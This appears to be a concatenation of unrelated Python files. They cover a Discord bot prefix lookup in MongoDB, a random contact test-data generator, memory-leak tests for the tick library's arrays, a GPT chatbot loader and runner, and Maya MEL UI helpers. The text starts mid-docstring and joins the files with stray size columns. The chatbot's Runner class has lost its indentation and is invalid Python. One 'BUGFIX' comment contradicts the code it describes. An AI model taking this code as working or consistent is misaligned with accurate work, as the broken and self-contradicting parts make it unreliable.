    (``_id`` 0 of ``Guardzilla.prefix``), registering the default prefix
    "." for guilds that have no entry yet.  When the message does not
    start with the stored prefix, falls back to the bot's user id so the
    bot still answers to mentions.
    """
    # Reuse a single MongoClient across calls: the previous code opened a
    # brand-new connection on every incoming message.
    mongo = getattr(prefix_d, "_mongo", None)
    if mongo is None:
        mongo = pymongo.MongoClient(
            f"mongodb+srv://{os.environ['info']}@cluster0.o0xc5.mongodb.net/myFirstDatabase?retryWrites=true&w=majority")
        prefix_d._mongo = mongo
    prefix = mongo["Guardzilla"]["prefix"]
    guild_id = str(message.guild.id)
    prefix_x = prefix.find_one({"_id": 0})
    if not prefix_x or guild_id not in prefix_x:
        # Upsert only this guild's entry.  The previous delete_one/insert_one
        # pair recreated the whole document, silently wiping every other
        # guild's custom prefix.
        prefix.update_one({"_id": 0}, {"$set": {guild_id: "."}}, upsert=True)
        prefix_x = prefix.find_one({"_id": 0})
    if str(message.content).startswith(prefix_x[guild_id]):
        return prefix_x[guild_id]
    return str(client.user.id)
# Bot with a dynamic per-guild prefix and the default help command disabled
# (a custom help command is loaded from the commands/ extensions).
client = nextcord.ext.commands.Bot(
    command_prefix=prefix_d, intents=intents, help_command=None)
@client.event
async def on_ready():
    """Log the connection, then load every command extension under ./commands."""
    print(f'{client.user} has connected to Discord!')
    extension_files = [entry for entry in os.listdir("./commands") if entry.endswith(".py")]
    for entry in extension_files:
        ext_name = entry[:-3]  # strip the ".py" suffix
        client.load_extension(f"commands.{ext_name}")
        print(f"{ext_name} | Loaded")
# Start the keep-alive web server (used by hosting platforms to ping the
# process), then block on the Discord gateway connection.
keep_alive()
client.run(TOKEN)
| 1,363 | 509 |
from models.model_contact import Contact
import random
import string
import os.path
import jsonpickle
import getopt
import sys
def random_string(prefix, maxlen):
    """Return *prefix* followed by 0..maxlen-1 random alphanumeric characters."""
    alphabet = string.ascii_letters + string.digits
    suffix_length = random.randrange(maxlen)
    return prefix + ''.join(random.choice(alphabet) for _ in range(suffix_length))
# Parse -n (number of random contacts) and -f (output file) from argv.
# The long options now take values ("=") and are actually honored below;
# previously they were declared without "=" and never matched.
try:
    opts, args = getopt.getopt(sys.argv[1:], "n:f:", ["number_of_groups=", "file="])
except getopt.GetoptError as err:
    # getopt has no usage() helper -- the old code raised AttributeError
    # here.  Report the parse error and a usage line instead.
    print(err)
    print("Usage: %s [-n number_of_contacts] [-f output_file]" % sys.argv[0])
    sys.exit(2)

n = 5                       # how many random contacts to generate
f = "data/contacts.json"    # output path, relative to the project root

for o, a in opts:
    if o in ("-n", "--number_of_groups"):
        n = int(a)
    elif o in ("-f", "--file"):
        f = a

# First contact is a fixed, human-readable record; the rest are random.
testdata = [Contact(firstname='Stepan', middlename='Barantsev', lastname='Lol',
                    nickname='Bloodes', email1='stepan.barantsev@gmail.com')] +\
           [Contact(firstname=random_string('', 10),
                    middlename=random_string('', 20),
                    lastname=random_string('', 20),
                    nickname=random_string('', 20),
                    homephone=random_string('', 20),
                    mobilephone=random_string('', 20),
                    workphone=random_string('', 20),
                    secondaryphone=random_string('', 20),
                    email1=random_string('', 20),
                    email2=random_string('', 20),
                    email3=random_string('', 20),
                    title=random_string('', 20),
                    notes=random_string('', 20),
                    company=random_string('', 20),
                    homepage=random_string('', 20),
                    fax=random_string('', 20))
            # Honor -n: the old code hard-coded range(5) and ignored it.
            for i in range(n)
            ]

# Serialize the generated contacts with jsonpickle, pretty-printed.
file = os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", f)
with open(file, 'w') as out:
    jsonpickle.set_encoder_options("json", indent=2)
    out.write(jsonpickle.encode(testdata))
| 1,841 | 603 |
# License: BSD 3 clause
import gc
import unittest
import weakref
import numpy as np
import scipy
from scipy.sparse import csr_matrix
from tick.array.build.array import tick_double_sparse2d_from_file
from tick.array.build.array import tick_double_sparse2d_to_file
from tick.array_test.build import array_test as test
class Test(unittest.TestCase):
    """Tests for tick's smart-pointer array bindings.

    Covers the C++ reference counting of Varray/SArray wrappers, brute-force
    memory-leak checks for the typemap in/out paths (skipped when psutil is
    unavailable), and buffer ownership shared between numpy/scipy and C++.
    """

    def test_varray_smart_pointer_in_cpp(self):
        """...Test C++ reference counter
        """
        vcc = test.VarrayContainer()
        self.assertEqual(vcc.nRef(), 0)
        vcc.initVarray()
        self.assertEqual(vcc.nRef(), 1)
        cu1 = test.VarrayUser()
        cu1.setArray(vcc)
        self.assertEqual(vcc.nRef(), 2)
        # Re-setting the same array must not bump the counter again.
        cu1.setArray(vcc)
        self.assertEqual(vcc.nRef(), 2)
        cu2 = test.VarrayUser()
        cu2.setArray(vcc)
        self.assertEqual(vcc.nRef(), 3)
        del cu1
        self.assertEqual(vcc.nRef(), 2)
        cu3 = test.VarrayUser()
        cu3.setArray(vcc)
        self.assertEqual(vcc.nRef(), 3)
        del cu3, cu2
        self.assertEqual(vcc.nRef(), 1)
        # we cannot check it will go to 0 after vcc deletion in Python
        cu4 = test.VarrayUser()
        cu4.setArray(vcc)
        self.assertEqual(vcc.nRef(), 2)
        del vcc
        self.assertEqual(cu4.nRef(), 1)
        # we cannot check it will go to 0 after cu4 deletion in Python
        del cu4

    def test_varray_smart_pointer_deletion1(self):
        """...Test that varray is still alive after deletion in Python
        """
        vcc = test.VarrayContainer()
        vcc.initVarray()
        # Now mix with some Python
        a = vcc.varrayPtr
        # This does not increment C++ reference counter
        self.assertEqual(vcc.nRef(), 1)
        # Get a weak ref of the array
        r = weakref.ref(a)
        del a
        np.testing.assert_array_almost_equal(r(), vcc.varrayPtr)
        del vcc
        self.assertIsNone(r())

    def test_varray_smart_pointer_deletion2(self):
        """...Test that base is deleted after a double assignment in Python
        """
        vcc = test.VarrayContainer()
        vcc.initVarray()
        a = vcc.varrayPtr
        b = vcc.varrayPtr
        r = weakref.ref(b)
        del a, vcc, b
        self.assertIsNone(r())

    def test_varray_smart_pointer_deletion3(self):
        """...Test that base is deleted after a double assignment in Python
        """
        vcc = test.VarrayContainer()
        vcc.initVarray()
        # Now mix with some Python
        a = vcc.varrayPtr
        a_sum = np.sum(a)
        # This does not increment C++ reference counter
        self.assertEqual(vcc.nRef(), 1)
        # Get a weak ref of the array
        r = weakref.ref(vcc.varrayPtr)
        del vcc
        np.testing.assert_array_almost_equal(a_sum, np.sum(a))
        self.assertIsNone(r())
        del a

    def test_sarray_memory_leaks(self):
        """...Test brute force method in order to see if we have a memory leak
        during typemap out
        """
        import os
        try:
            import psutil
        except ImportError:
            print('Without psutils we cannot ensure we have no memory leaks')
            return

        def get_memory_used():
            """Returns memory used by current process
            """
            process = psutil.Process(os.getpid())
            return process.memory_info()[0]

        initial_memory = get_memory_used()
        size = int(1e6)
        # The size in memory of an array of ``size`` doubles
        bytes_size = size * 8
        a = test.test_typemap_out_SArrayDoublePtr(size)
        first_filled_memory = get_memory_used()
        # Check that new memory is of the correct order (10%)
        self.assertAlmostEqual(first_filled_memory - initial_memory,
                               bytes_size, delta=1.1 * bytes_size)
        for _ in range(10):
            del a
            a = test.test_typemap_out_SArrayDoublePtr(size)
            filled_memory = get_memory_used()
            # Check memory is not increasing
            self.assertAlmostEqual(first_filled_memory - initial_memory,
                                   filled_memory - initial_memory,
                                   delta=1.1 * bytes_size)
        #print("\nfirst_filled_memory %.2g, filled_memory %.2g, initial_memory %.2g, array_bytes_size %.2g" % (first_filled_memory, filled_memory, initial_memory, bytes_size))

    def test_sarray_memory_leaks2(self):
        """...Test brute force method in order to see if we have a memory leak
        during typemap in or out
        """
        import os
        try:
            import psutil
        except ImportError:
            print('Without psutils we cannot ensure we have no memory leaks')
            return

        def get_memory_used():
            """Returns memory used by current process
            """
            process = psutil.Process(os.getpid())
            return process.memory_info()[0]

        size = int(1e6)
        a, b = np.ones(size), np.arange(size, dtype=float)
        initial_memory = get_memory_used()
        # The size in memory of an array of ``size`` doubles
        bytes_size = 2 * size * 8
        c = test.test_VArrayDouble_append(a, b)
        first_filled_memory = get_memory_used()
        # Check that new memory is of the correct order (10%)
        self.assertAlmostEqual(first_filled_memory,
                               initial_memory + bytes_size,
                               delta=1.1 * bytes_size)
        for _ in range(10):
            del c
            c = test.test_VArrayDouble_append(a, b)
            filled_memory = get_memory_used()
            # Check memory is not increasing
            self.assertAlmostEqual(first_filled_memory - initial_memory,
                                   filled_memory - initial_memory,
                                   delta=1.1 * bytes_size)

    def test_sarray2d_memory_leaks(self):
        """...Test brute force method in order to see if we have a memory leak
        during typemap out
        """
        import os
        try:
            import psutil
        except ImportError:
            print('Without psutils we cannot ensure we have no memory leaks')
            return

        def get_memory_used():
            """Returns memory used by current process
            """
            process = psutil.Process(os.getpid())
            return process.memory_info()[0]

        initial_memory = get_memory_used()
        n_rows = int(1e2)
        n_cols = int(1e3)
        # The size in memory of an array of ``size`` doubles
        bytes_size = n_rows * n_cols * 8
        a = test.test_typemap_out_SArrayDouble2dPtr(n_rows, n_cols)
        first_filled_memory = get_memory_used()
        # Check that new memory is of the correct order (10%)
        self.assertAlmostEqual(first_filled_memory - initial_memory,
                               bytes_size, delta=1.1 * bytes_size)
        for _ in range(10):
            del a
            a = test.test_typemap_out_SArrayDouble2dPtr(n_rows, n_cols)
            filled_memory = get_memory_used()
            # Check memory is not increasing
            self.assertAlmostEqual(first_filled_memory - initial_memory,
                                   filled_memory - initial_memory,
                                   delta=1.1 * bytes_size)

    def test_s_sparse_array2d_memory_leaks(self):
        """...Test brute force method in order to see if we have a memory leak
        during typemap out
        """
        import os
        try:
            import psutil
        except ImportError:
            print('Without psutils we cannot ensure we have no memory leaks')
            return

        def get_memory_used():
            """Returns memory used by current process
            """
            process = psutil.Process(os.getpid())
            return process.memory_info()[0]

        cereal_file = "sparse.gen.cereal"
        try:
            n_rows = int(1e3)
            n_cols = int(1e2)
            s_spar = int((n_rows * n_cols) * .3)
            data_size = (s_spar * 8)
            # The size in memory of an array of ``size`` doubles
            bytes_size = (data_size * 2) + ((n_rows + 1) * 8)
            sparsearray_double = scipy.sparse.rand(
                n_rows, n_cols, 0.3, format="csr", dtype=np.float64)
            tick_double_sparse2d_to_file(cereal_file, sparsearray_double)
            initial_memory = get_memory_used()
            a = tick_double_sparse2d_from_file(cereal_file)
            first_filled_memory = get_memory_used()
            # Check that new memory is of the correct order (10%)
            self.assertAlmostEqual(first_filled_memory - initial_memory,
                                   bytes_size, delta=1.1 * bytes_size)
            del a
            for i in range(10):
                # Check memory is not increasing
                gc.collect()
                filled_memory = get_memory_used()
                self.assertAlmostEqual(filled_memory, initial_memory,
                                       delta=1.1 * bytes_size)
                X = tick_double_sparse2d_from_file(cereal_file)
                del X
            gc.collect()
            end = get_memory_used()
            self.assertAlmostEqual(end, initial_memory, delta=1.1 * bytes_size)
        finally:
            # Always remove the serialized scratch file, even on failure.
            if os.path.exists(cereal_file):
                os.remove(cereal_file)

    def test_varray_share_same_support(self):
        """...Test that modifications on Varray of in Python affect the same
        support
        """
        vcc = test.VarrayContainer()
        vcc.initVarray()
        # Now mix with some Python
        a = vcc.varrayPtr
        a[0] = 99.0
        self.assertEqual(vcc.varrayPtr[0], 99.0)
        vcc.varrayPtr[1] = 999.0
        self.assertEqual(a[1], 999.0)

    def test_sbasearrayptr(self):
        sparsearray_double = csr_matrix(
            (np.array([1., 2, 3, 4, 5]), np.array([2, 4, 6, 8, 10]),
             np.array([0, 5])), shape=(1, 12))
        test.test_sbasearray_container_new(sparsearray_double)
        self.assertEqual(test.test_sbasearray_container_compute(), 45)
        test.test_sbasearray_container_clear()
        # -1 is the sentinel returned once the container has been cleared.
        self.assertEqual(test.test_sbasearray_container_compute(), -1)
        array_double = np.arange(2, 14, dtype=float)
        test.test_sbasearray_container_new(array_double)
        self.assertEqual(test.test_sbasearray_container_compute(),
                         array_double.sum())
        test.test_sbasearray_container_clear()
        self.assertEqual(test.test_sbasearray_container_compute(), -1)

    def test_ref_sbasearrayptr(self):
        sparsearray_double = csr_matrix(
            (np.array([1., 2, 3, 4, 5]), np.array([2, 4, 6, 8, 10]),
             np.array([0, 5])), shape=(1, 12))
        refdata = weakref.ref(sparsearray_double.data)
        refindices = weakref.ref(sparsearray_double.indices)
        refindptr = weakref.ref(sparsearray_double.indptr)
        test.test_sbasearray_container_new(sparsearray_double)
        del sparsearray_double
        # data/indices are kept alive by the C++ side; indptr is not.
        self.assertIsNone(refindptr())
        self.assertIsNotNone(refdata())
        self.assertIsNotNone(refindices())
        test.test_sbasearray_container_clear()
        self.assertIsNone(refdata())
        self.assertIsNone(refindices())
        array_double = np.arange(2, 14, dtype=float)
        ref = weakref.ref(array_double)
        test.test_sbasearray_container_new(array_double)
        del array_double
        self.assertIsNotNone(ref())
        test.test_sbasearray_container_clear()
        self.assertIsNone(ref())

    def test_sbasearray2dptr(self):
        sparsearray2d_double = csr_matrix(
            (np.array([1., 2, 3, 4, 5]), np.array([2, 4, 6, 1, 3]),
             np.array([0, 3, 5])), shape=(2, 4))
        test.test_sbasearray2d_container_new(sparsearray2d_double)
        self.assertEqual(test.test_sbasearray2d_container_compute(), 39)
        test.test_sbasearray2d_container_clear()
        # -1 is the sentinel returned once the container has been cleared.
        self.assertEqual(test.test_sbasearray2d_container_compute(), -1)
        array2d_double = np.array([[1.2, 3], [4, 5]])
        test.test_sbasearray2d_container_new(array2d_double)
        self.assertEqual(test.test_sbasearray2d_container_compute(),
                         array2d_double.sum())
        test.test_sbasearray2d_container_clear()
        self.assertEqual(test.test_sbasearray2d_container_compute(), -1)

    def test_ref_sbasearray2dptr(self):
        sparsearray2d_double = csr_matrix(
            (np.array([1., 2, 3, 4, 5]), np.array([2, 4, 6, 1, 3]),
             np.array([0, 3, 5])), shape=(2, 4))
        refdata = weakref.ref(sparsearray2d_double.data)
        refindices = weakref.ref(sparsearray2d_double.indices)
        refindptr = weakref.ref(sparsearray2d_double.indptr)
        test.test_sbasearray2d_container_new(sparsearray2d_double)
        del sparsearray2d_double
        # In the 2d case all three buffers stay alive while the container holds them.
        self.assertIsNotNone(refindptr())
        self.assertIsNotNone(refdata())
        self.assertIsNotNone(refindices())
        test.test_sbasearray2d_container_clear()
        self.assertIsNone(refindptr())
        self.assertIsNone(refdata())
        self.assertIsNone(refindices())
        array2d_double = np.array([[1.2, 3], [4, 5]])
        ref = weakref.ref(array2d_double)
        test.test_sbasearray2d_container_new(array2d_double)
        del array2d_double
        self.assertIsNotNone(ref())
        test.test_sbasearray2d_container_clear()
        self.assertIsNone(ref())
# Allow running this test module directly with `python <file>`.
if __name__ == "__main__":
    unittest.main()
| 13,598 | 4,274 |
# Author: DINDIN Meryll
# Date: 15 September 2019
# Project: RoadBuddy
try: from chatbot.imports import *
except: from imports import *
class Contextualizer:
    """Loads (downloading first if necessary) the fine-tuned GPT chat model.

    On construction, tries to load the tokenizer/model from the local
    'models' directory; if that fails, creates the work directories,
    downloads the dataset and model archive from S3, then loads again.
    """

    def __init__(self):
        try:
            self._load_models()
        except Exception:  # narrowed from a bare except: keep Ctrl-C working
            for d in ('models', 'datasets'):
                if not os.path.exists(d):
                    os.mkdir(d)
            self._download_models()
            self._load_models()

    def _download_models(self):
        """Fetch the persona-chat dataset and the model archive from S3."""
        s3 = boto3.client('s3')
        # Download dataset
        fle = ('datasets.huggingface.co', 'personachat/personachat_self_original.json')
        s3.download_file(*fle, 'datasets/persona-chat.json')
        # Download model.  BUGFIX: the original passed the tuple itself as
        # the Bucket argument (s3.download_file(fle, ...)), which always
        # raised; unpack it like the dataset call above.
        fle = ('models.huggingface.co', 'transfer-learning-chatbot/finetuned_chatbot_gpt.tar.gz')
        s3.download_file(*fle, 'models/gpt.tar.gpz')
        # NOTE(review): extractall is unsafe on untrusted archives; this one
        # comes from a fixed, trusted bucket -- confirm before reusing.
        with tarfile.open('models/gpt.tar.gpz', 'r:gz') as archive:
            archive.extractall('models')
        # Remove tar file
        os.remove('models/gpt.tar.gpz')

    def _load_models(self):
        """Load tokenizer and LM head model from the local 'models' directory."""
        self.token = OpenAIGPTTokenizer.from_pretrained('models')
        self.model = OpenAIGPTLMHeadModel.from_pretrained('models')

    def tokenize_personnalities(self):
        """Tokenize the persona-chat dataset and cache it as a torch file."""
        with open('datasets/persona-chat.json', encoding='utf-8') as f:
            dtb = json.loads(f.read())

        def tokenize(obj):
            # Recursively tokenize strings inside nested dicts/lists.
            if isinstance(obj, str):
                return self.token.convert_tokens_to_ids(self.token.tokenize(obj))
            if isinstance(obj, dict):
                return dict((n, tokenize(o)) for n, o in obj.items())
            return list(tokenize(o) for o in obj)

        dtb = tokenize(dtb)
        torch.save(dtb, 'datasets/persona-cached')
class Trigger:
    """Keyword-triggered canned responses: dad jokes and animal fun facts."""

    def __init__(self):
        self.url_jokes = 'https://icanhazdadjoke.com'
        self.url_facts = 'https://some-random-api.ml/facts'

    def get(self, message):
        """Return a joke or fun fact when *message* asks for one, else ''."""
        if 'joke' in message:
            payload = requests.get(self.url_jokes, headers={"Accept": "application/json"}).json()
            return payload['joke']
        if ('fun' in message) and ('fact' in message):
            animal = np.random.choice(['panda', 'cat', 'dog', 'fox', 'bird', 'koala'])
            response = requests.get('/'.join([self.url_facts, animal]))
            return json.loads(response.content)['fact']
        return ''
class Runner:
SPECIAL_TOKENS = ["<bos>", "<eos>", "<speaker1>", "<speaker2>", "<pad>"]
def __init__(self, directory='models'):
self.hists = []
self.trigs = Trigger()
self.token = OpenAIGPTTokenizer.from_pretrained(directory)
self.model = OpenAIGPTLMHeadModel.from_pretrained(directory)
def set_background(self, characteristics):
self.perso = [self.token.convert_tokens_to_ids(self.token.tokenize(e)) for e in characteristics]
def read_background(self):
for e in self.token.decode(chain(*self.perso)): print('-', e)
def input_from_segments(self, history, reply):
bos, eos, speaker1, speaker2 = self.token.convert_tokens_to_ids(self.SPECIAL_TOKENS[:-1])
instance = {}
sequence = [[bos] + list(chain(*self.perso))] + history + [reply]
sequence = [sequence[0]] + [[speaker2 if (len(sequence)-i) % 2 else speaker1] + s for i, s in enumerate(sequence[1:])]
instance["input_ids"] = list(chain(*sequence))
instance["token_type_ids"] = [speaker2 if i % 2 else speaker1 for i, s in enumerate(sequence) for _ in s]
instance["mc_token_ids"] = len(instance["input_ids"]) - 1
instance["lm_labels"] = [-1] * len(instance["input_ids"])
return instance, sequence
@staticmethod
def top_filtering(logits, top_k=0, top_p=0.9, threshold=-float('Inf'), filter_value=-float('Inf')):
assert logits.dim() == 1
top_k = min(top_k, logits.size(-1))
if top_k > 0:
# Remove all tokens with a probability less than the last token in the top-k tokens
indices_to_remove = logits < torch.topk(logits, top_k)[0][..., -1, None]
logits[indices_to_remove] = filter_value
if top_p > 0.0:
# Compute cumulative probabilities of sorted tokens
sorted_logits, sorted_indices = torch.sort(logits, descending=True)
cumulative_probabilities = torch.cumsum(F.softmax(sorted_logits, dim=-1), dim=-1)
# Remove tokens with cumulative probability above the threshold
sorted_indices_to_remove = cumulative_probabilities > top_p
# Shift the indices to the right to keep also the first token above the threshold
sorted_indices_to_remove[..., 1:] = sorted_indices_to_remove[..., :-1].clone()
sorted_indices_to_remove[..., 0] = 0
# Back to unsorted indices and set them to -infinity
indices_to_remove = sorted_indices[sorted_indices_to_remove]
logits[indices_to_remove] = filter_value
indices_to_remove = logits < threshold
logits[indices_to_remove] = filter_value
return logits
def sample_sequence(self, history, min_length=1, max_length=30, temperature=0.7, current_output=None):
    """Autoregressively sample a reply from the model.

    Args:
        history: list of token-id lists (conversation turns).
        min_length: minimum reply length before a special token may end
            sampling (resampled until then).
        max_length: maximum number of tokens to generate.
        temperature: softmax temperature applied to the logits.
        current_output: optional partial output to continue from.

    Returns:
        list[int]: the sampled token ids.
    """
    special_tokens_ids = self.token.convert_tokens_to_ids(self.SPECIAL_TOKENS)
    if current_output is None:
        current_output = []
    for step in range(max_length):
        instance, _ = self.input_from_segments(history, current_output)
        input_ids = torch.tensor(instance["input_ids"], device='cpu').unsqueeze(0)
        token_type_ids = torch.tensor(instance["token_type_ids"], device='cpu').unsqueeze(0)
        logits = self.model(input_ids, token_type_ids=token_type_ids)
        logits = logits[0, -1, :] / temperature
        logits = self.top_filtering(logits)
        probs = F.softmax(logits, dim=-1)
        prev = torch.multinomial(probs, 1)
        # BUGFIX: honour the `min_length` parameter (the old code hard-coded
        # `i < 1`, so min_length was silently ignored).
        if step < min_length and prev.item() in special_tokens_ids:
            while prev.item() in special_tokens_ids:
                if probs.max().item() == 1:
                    # All probability mass is on a special token; resampling
                    # can never succeed — avoid an infinite loop.
                    break
                prev = torch.multinomial(probs, num_samples=1)
        if prev.item() in special_tokens_ids:
            break
        current_output.append(prev.item())
    return current_output
def answer(self, message, time=4):
    """Generate a reply to *message* and update the rolling history.

    Args:
        message: incoming user utterance.
        time: number of most recent encoded turns to keep in history.

    Returns:
        str: the decoded response, with any configured trigger appended.
    """
    self.hists.append(self.token.encode(message))
    with torch.no_grad():
        out_ids = self.sample_sequence(self.hists)
    response = self.token.decode(out_ids, skip_special_tokens=True)
    # BUGFIX: trigs.get() returns None for messages without a trigger,
    # which used to raise TypeError inside str.join.  Only append a
    # trigger when one exists.
    trigger = self.trigs.get(message)
    if trigger:
        response = ' '.join([response, trigger])
    self.hists.append(self.token.encode(response))
    self.hists = self.hists[-time:]
    return response
| 6,878 | 2,181 |
# encoding=utf-8
import re
#
import types
# noinspection PyUnresolvedReferences
import maya.mel as mel
# noinspection PyUnresolvedReferences
import maya.cmds as cmds
#
# Registry mapping id(pyObj) -> Python callable.  Generated MEL procs call
# back into this module and look their target up here at invocation time.
_objectStore = {}
#
def pyToMelProc(pyObj, args=(), returnType=None, procName=None, useName=False, procPrefix='pyToMel_'):
    """Generate a global MEL proc that forwards its arguments to the Python
    callable *pyObj* via the module-level ``_objectStore`` registry.

    Args:
        pyObj: Python callable to expose to MEL.
        args: iterable of (melType, name) parameter pairs, e.g.
            ``[('string', 'nodeName')]``.
        returnType: MEL return type string, or None for a void proc.
        procName: explicit MEL proc name; overrides all name generation.
        useName: if True (and no procName), use ``pyObj.__name__`` directly.
        procPrefix: prefix used when a name is synthesized from the object.

    Returns:
        str: the name of the generated MEL proc.
    """
    melParams = []
    pyParams = []
    melReturn = returnType if returnType else ''
    for t, n in args:
        melParams.append('%s $%s' % (t, n))
        # String args must be re-quoted inside the embedded python() call.
        if t == 'string':
            pyParams.append(r"""'"+$%s+"'""" % n)
        else:
            pyParams.append(r'"+$%s+"' % n)
    objId = id(pyObj)
    d = {}
    if procName:
        d['procName'] = procName
    elif useName:
        d['procName'] = pyObj.__name__
    else:
        # Synthesize a unique name from the callable's kind, name and id().
        # NOTE(review): types.LambdaType is the same object as FunctionType,
        # so the first branch matches all plain functions — confirm intended.
        if isinstance(pyObj, types.LambdaType):
            procPrefix += '_lambda'
        elif isinstance(pyObj, (types.FunctionType, types.BuiltinFunctionType)):
            try:
                procPrefix += '_' + pyObj.__name__
            except (AttributeError, TypeError):
                pass
        elif isinstance(pyObj, types.MethodType):
            # Python 2 bound methods expose their class via im_class.
            try:
                procPrefix += '_' + pyObj.im_class.__name__ + '_' + pyObj.__name__
            except (AttributeError, TypeError):
                pass
        d['procName'] = '%s%s' % (procPrefix, objId)
    # Sanitize characters that are illegal in MEL identifiers.
    d['procName'] = d['procName'].replace('<', '_').replace('>', '_').replace('-', '_')
    d['melParams'] = ', '.join(melParams)
    d['pyParams'] = ', '.join(pyParams)
    d['melReturn'] = melReturn
    d['thisModule'] = __name__
    d['id'] = objId
    # Build and eval the MEL proc body; it re-imports this module and calls
    # the registered Python object through _objectStore.
    contents = '''global proc %(melReturn)s %(procName)s(%(melParams)s){'''
    if melReturn:
        contents += 'return '
    contents += '''python("import %(thisModule)s;%(thisModule)s._objectStore[%(id)s](%(pyParams)s)");}'''
    mel.eval(contents % d)
    _objectStore[objId] = pyObj
    return d['procName']
#
def capitalize(s):
    """Upper-case the first character of *s*, leaving the rest untouched.
    Empty strings are returned unchanged."""
    if not s:
        return s
    return s[0].upper() + s[1:]
#
def prettify(s):
    """Split a camelCase identifier into capitalized, space-separated
    words (digits stick to the preceding word)."""
    words = re.findall('[a-zA-Z][a-z]*[0-9]*', s)
    return ' '.join(w[0].upper() + w[1:] for w in words)
#
def toCamelCase(s):
    """Convert a snake_case name to camelCase."""
    pieces = s.split('_')
    result = pieces[0]
    for piece in pieces[1:]:
        result += piece[:1].upper() + piece[1:]
    return result
#
def aeCallback(func):
    """Wrap *func* as a MEL-callable Attribute Editor callback that
    receives the node name as its single string argument."""
    return pyToMelProc(func, args=[('string', 'nodeName')], procPrefix='AECallback')
#
def attrTextFieldGrp(*args, **kwargs):
    """textFieldGrp wrapper bound to a string attribute.

    Mirrors the attr*Grp command family: supports create, ``edit``/``e``
    and ``query``/``q`` modes.  The field is kept in sync with the
    attribute via a scriptJob, and edits to the field are written back
    with ``cmds.setAttr``.

    Kwargs:
        attribute / a: full 'node.attr' plug name (required).
        changeCommand / cc: optional callable invoked after the attribute
            is updated from the field.
        label: UI label (defaults to Maya's interToUI of the attr name).
    """
    attribute = kwargs.pop('attribute', kwargs.pop('a', None))
    assert attribute is not None, "You Must Passed an Attribute"
    changeCommand = kwargs.pop('changeCommand', kwargs.pop('cc', None))
    # cc: write the field value into the attribute, then chain to the
    # user's callback when one was supplied.
    if changeCommand:
        # noinspection PyCallingNonCallable
        def cc(newVal):
            cmds.setAttr(attribute, newVal, type="string")
            changeCommand(newVal)
    else:
        def cc(newVal):
            cmds.setAttr(attribute, newVal, type="string")
    if kwargs.pop('edit', kwargs.pop('e', False)):
        # Edit mode: rebind an existing control to the (possibly new) plug.
        ctrl = args[0]
        cmds.textFieldGrp(
            ctrl,
            edit=True,
            text=cmds.getAttr(attribute),
            changeCommand=cc
        )
        # replacePrevious drops the scriptJob from the previous binding.
        cmds.scriptJob(
            parent=ctrl,
            replacePrevious=True,
            attributeChange=[attribute, lambda: cmds.textFieldGrp(ctrl, edit=True, text=cmds.getAttr(attribute))]
        )
    elif kwargs.pop('query', kwargs.pop('q', False)):
        # Query mode is not implemented.
        pass
    else:
        # Create mode.
        labelText = kwargs.pop('label', None)
        if not labelText:
            labelText = mel.eval('interToUI(\"{}\")'.format(attribute.split('.')[-1]))
        ctrl = None
        if len(args) > 0:
            ctrl = args[0]
            cmds.textFieldGrp(
                ctrl,
                label=labelText,
                text=cmds.getAttr(attribute),
                changeCommand=cc
            )
        else:
            ctrl = cmds.textFieldGrp(
                label=labelText,
                text=cmds.getAttr(attribute),
                changeCommand=cc
            )
        # Keep the field updated when the attribute changes elsewhere.
        cmds.scriptJob(
            parent=ctrl,
            attributeChange=[attribute, lambda: cmds.textFieldGrp(ctrl, edit=True, text=cmds.getAttr(attribute))]
        )
        return ctrl
#
def attrType(attr):
    """Return the Maya type of *attr*, mapping float3 plugs that are
    flagged usedAsColor to the pseudo-type 'color'."""
    kind = cmds.getAttr(attr, type=True)
    if kind != 'float3':
        return kind
    node, shortName = attr.split('.', 1)
    if cmds.attributeQuery(shortName, node=node, usedAsColor=1):
        return 'color'
    return kind
#
def modeMethod(func):
    """Decorator for template methods: dispatch the call to the template's
    current mode object, or record it for later replay when the template
    is in record mode."""
    def dispatcher(self, *args, **kwargs):
        target = getattr(self._mode, func.__name__)
        if self._record:
            self._actions.append((target, args, kwargs))
        else:
            target(*args, **kwargs)
    dispatcher.__doc__ = func.__doc__
    dispatcher.__name__ = func.__name__
    dispatcher._orig = func
    return dispatcher
#
def modeAttrMethod(func):
    """Decorator for template methods whose first argument is an attribute
    name.  Like modeMethod, but additionally: validates the attribute is a
    string, optionally converts snake_case to camelCase, and records the
    attribute on the template's ``_attributes`` list.

    (Python 2 module: the type check uses ``basestring``.)
    """
    def wrapped(self, attr, *args, **kwargs):
        assert isinstance(attr, basestring), "%r.%s: attr argument must be a string, got %s" % (self, func.__name__, type(attr).__name__)
        modeFunc = getattr(self._mode, func.__name__)
        # Honour the template's naming-style switch.
        if self.convertToMayaStyle:
            attr = toCamelCase(attr)
        if self._record:
            self._actions.append((modeFunc, (attr,) + args, kwargs))
        else:
            modeFunc(attr, *args, **kwargs)
        # Track every attribute the template touches (used for suppression).
        self._attributes.append(attr)
    wrapped.__doc__ = func.__doc__
    wrapped.__name__ = func.__name__
    wrapped._orig = func
    return wrapped
#
def swatchLabel(nodeName):
    """Derive a human-readable swatch label from the node's classification
    strings (e.g. 'shader/surface' -> 'Surface').

    NOTE(review): this returns on the first non-'swatch' classification
    component encountered; whether that is the intended precedence should
    be confirmed against Maya's classification ordering.
    """
    nodeType = cmds.nodeType(nodeName)
    classificationsList = cmds.getClassification(nodeType)
    for classification in classificationsList:
        allClassList = classification.split(':')
        for allClass in allClassList:
            classList = allClass.split('/')
            # Skip pure 'swatch' classifications.
            if 'swatch' == classList[0]:
                continue
            else:
                if classList:
                    # Drop interior 'shader' components unless it is the
                    # final (most specific) one.
                    if 'shader' != classList[-1]:
                        classList = filter(lambda x: x != 'shader', classList)
                    return "\n".join(map(lambda x: x.capitalize(), classList))
                else:
                    return "Sample"
#
def swatchDisplayNew(plugName):
    """Create the AE swatch UI (label, render swatch and size popup) for
    the node owning *plugName*, then populate it via swatchDisplayReplace."""
    nodeAndAttrs = plugName.split(".")
    node = nodeAndAttrs[0]
    cmds.formLayout('swatchDisplayForm')
    cmds.text('swatchLabel', label=swatchLabel(node))
    cmds.swatchDisplayPort('swatchDisplay', wh=(64, 64), rs=64)
    # Right-click menu used to choose the swatch size.
    cmds.popupMenu('swatchPopup', button=3)
    cmds.menuItem('swatchSmall', label='Small')
    cmds.menuItem('swatchMedium', label='Medium')
    cmds.menuItem('swatchLarge', label='Large')
    cmds.setParent(upLevel=True)
    # AE global: width of the text column, fetched from MEL.
    gTextColumnWidthIndex = mel.eval("$tempVar=$gTextColumnWidthIndex;")
